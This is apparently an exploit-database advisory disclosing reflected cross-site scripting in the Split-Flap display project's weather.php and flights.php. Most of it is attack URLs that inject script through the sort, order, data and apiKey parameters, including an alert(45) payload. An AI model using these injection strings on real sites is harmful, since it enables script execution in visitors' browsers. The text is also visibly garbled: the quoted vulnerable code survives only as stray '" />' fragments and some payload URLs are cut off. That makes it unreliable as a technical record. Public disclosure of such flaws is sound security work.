Split-Flap - Reflected Cross Site Scripting(weather.php, flights.php) # Exploit Title: Split-Flap - Reflected Cross Site Scripting(weather.php, flights.php) # Date: 2016-06-10 # Exploit Author: HaHwul # Exploit Author Blog: www.hahwul.com # Vendor Homepage: https://github.com/baspete/Split-Flap , http://pete.basdesign.com/ # Software Link: https://github.com/baspete/Split-Flap/archive/master.zip # Version: none(releases) # Tested on: Debian [wheezy] # CVE : none ### Vulnerability Details ##################################################### # The echo function in a and b are vulnerable. # # # " /> # " /> # " /> ############################################################################### ### XSS1 - flights.php Attack Code http://127.0.0.1/vul_test/Split-Flap/flights.php?data=departures&sort=scheduled">&order=as weak parameters - order - sort - data ### XSS2 - weather.php Attack Code http://127.0.0.1/vul_test/Split-Flap/weather.php?data=KSFO&apiKey="%2Balert(45)%2B"a http://127.0.0.1/vul_test/Split-Flap/weather.php?data=KSFO&apiKey= weak parameters - apikey - data ### Vulnerability Details #####################################################